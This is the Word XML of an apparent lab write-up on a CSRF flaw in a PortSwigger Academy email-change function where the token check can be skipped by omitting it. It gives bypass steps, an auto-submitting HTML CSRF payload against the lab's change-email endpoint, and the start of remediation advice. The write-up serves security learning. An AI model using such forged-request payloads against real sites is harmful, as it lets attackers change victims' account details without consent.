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9D2FA" w14:textId="77777777" w:rsidR="00320924" w:rsidRDefault="002F152E" w:rsidP="002F152E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671F71F9" w14:textId="6B9CEAA1" w:rsidR="002F152E" w:rsidRDefault="00C84C96" w:rsidP="006B684D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">The application </w:t>
      </w:r>
      <w:r w:rsidR="00C44177">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>consists of an email change functionality which is vulnerable to CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00466759">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> but </w:t>
      </w:r>
      <w:r w:rsidR="00846E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>it only validates the CSRF token if it’s present in the request otherwise it just ignores it</w:t>
      </w:r>
      <w:r w:rsidR="00C44177">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>. We will try to mount an exploit and deliver it to the target with the help of an exploit server</w:t>
      </w:r>
      <w:r w:rsidR="005B750D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to change the email address of the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C643D4A" w14:textId="77777777" w:rsidR="00675428" w:rsidRDefault="00675428" w:rsidP="002F152E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9025EF" w14:textId="77777777"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7067F2A5" w14:textId="343453D6" w:rsidR="001007B5" w:rsidRDefault="007F5950"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Go</w:t>
      </w:r>
      <w:r w:rsidR="0038106E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> the vulnerable web applications</w:t>
      </w:r>
      <w:r w:rsidR="0033120F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E31496">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">and log in with the username and password provided to act as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00840938">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E31496">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03325C92" w14:textId="4A2C8E91" w:rsidR="00E31496" w:rsidRDefault="00840938"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Then change the email once to study the HTTP request and response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321D4B46" w14:textId="5ABF91C4" w:rsidR="0052488A" w:rsidRDefault="0052488A"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In the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>BurpSuite’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proxy tab right click on the request and select Engagement tools and then on generate CSRF PoC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8C67F" w14:textId="0C095EAE" w:rsidR="00BC3984" w:rsidRDefault="00BC3984"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Then in the dialogue box enable the option to auto-submit script and click Regenerate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2DF48" w14:textId="22FEE157" w:rsidR="00970BF8" w:rsidRDefault="00970BF8"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Go to the exploit server and paste the request </w:t>
      </w:r>
      <w:r w:rsidR="00846E37" w:rsidRPr="00846E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">into the body tag of the exploit </w:t>
      </w:r>
      <w:r w:rsidR="00846E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">and remove the entire input tag consisting of CSRF token, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>then click store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242475AA" w14:textId="4285A1E6" w:rsidR="000564D4" w:rsidRDefault="000564D4"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At the end, click the button to deliver the exploit to the victim</w:t>
      </w:r>
      <w:r w:rsidR="005657B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, we will see that our POST request gets rejected due to security measures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72287575" w14:textId="285E0387" w:rsidR="00380DB3" w:rsidRPr="001007B5" w:rsidRDefault="00380DB3"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Now modify the request from POST to GET in order to get it through the security protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361F39F9" w14:textId="77777777" w:rsidR="00131AF3" w:rsidRDefault="00131AF3" w:rsidP="00E050CA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3117D4FE" w14:textId="1F55B576" w:rsidR="00CD3D3A" w:rsidRDefault="002F152E" w:rsidP="00E050CA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PAY</w:t>
      </w:r>
      <w:r w:rsidR="00BD4233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>OAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB266AC" w14:textId="77777777" w:rsidR="00900668" w:rsidRPr="00900668" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03199155" w14:textId="77777777" w:rsidR="00900668" w:rsidRPr="00900668" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF PoC - generated by Burp Suite Professional --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E909E1" w14:textId="77777777" w:rsidR="00900668" w:rsidRPr="00900668" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C9F5C" w14:textId="77777777" w:rsidR="00900668" w:rsidRPr="00900668" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>history.pushState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>('', '', '/')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEA53BF" w14:textId="77777777" w:rsidR="00900668" w:rsidRPr="00900668" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;form action="https://0a5f0075038dda8d81483e3d00cf00e2.web-security-academy.net/my-account/change-email" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379B8DFB" w14:textId="411B3788" w:rsidR="00900668" w:rsidRPr="00900668" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="email" value="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>rudransh@gmail.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A2B23B" w14:textId="77777777" w:rsidR="00900668" w:rsidRPr="00900668" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input type="submit" value="Submit request" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C7413" w14:textId="77777777" w:rsidR="00900668" w:rsidRPr="00900668" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661DD34B" w14:textId="77777777" w:rsidR="00900668" w:rsidRPr="00900668" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213FCEA5" w14:textId="77777777" w:rsidR="00900668" w:rsidRPr="00900668" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>document.forms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>[0].submit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E76716" w14:textId="77777777" w:rsidR="00900668" w:rsidRPr="00900668" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A73FB" w14:textId="77777777" w:rsidR="00900668" w:rsidRPr="00900668" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689156CE" w14:textId="55F05ED7" w:rsidR="006C25F7" w:rsidRPr="006C0B72" w:rsidRDefault="00900668" w:rsidP="00900668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F744A" w14:textId="24C4D243" w:rsidR="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF7E50C" w14:textId="212DAACF" w:rsidR="00B20FC9" w:rsidRDefault="00B20FC9" w:rsidP="00B20FC9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20FC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21D9A102" wp14:editId="0A63E513">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>708660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4531995" cy="5344160"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8890"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="103840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409027" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4531995" cy="53441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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389CC2D8" w14:textId="651FDE09" w:rsidR="00B20FC9" w:rsidRDefault="00B20FC9" w:rsidP="00B20FC9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C89195B" w14:textId="50CB4548" w:rsidR="00B20FC9" w:rsidRPr="006C0B72" w:rsidRDefault="00B20FC9" w:rsidP="00B20FC9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20FC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7974B601" wp14:editId="5CEDCF42">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>173990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5486400" cy="2407920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1210368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68704" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2407920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6331C2" w14:textId="772B3D0E"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6568E9F4" w14:textId="2597C372" w:rsidR="00146091" w:rsidRPr="00B35C47" w:rsidRDefault="00146091" w:rsidP="004835BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B35C47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Mandatory CSRF Token Validation:</w:t>
      </w:r>
      <w:r w:rsidR="00B35C47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B35C47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Ensure that every state-changing request, whether POST or otherwise, mandates the presence of a valid CSRF token. If the CSRF token is absent or invalid, the request should be rejected. This prevents attackers from simply omitting the CSRF token to bypass the validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB97642" w14:textId="1C0B806F" w:rsidR="00146091" w:rsidRPr="00B35C47" w:rsidRDefault="00146091" w:rsidP="008D3468">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B35C47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Avoid State-Changing GET Requests:</w:t>
      </w:r>
      <w:r w:rsidR="00B35C47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
